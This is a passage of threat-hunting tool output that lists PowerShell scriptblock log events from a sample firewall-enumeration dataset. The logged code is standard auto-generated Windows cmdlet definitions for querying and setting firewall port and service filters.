($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() 
} } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 
NetFirewallServiceFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' function Set-NetFirewallServiceFilter { 
[CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) 
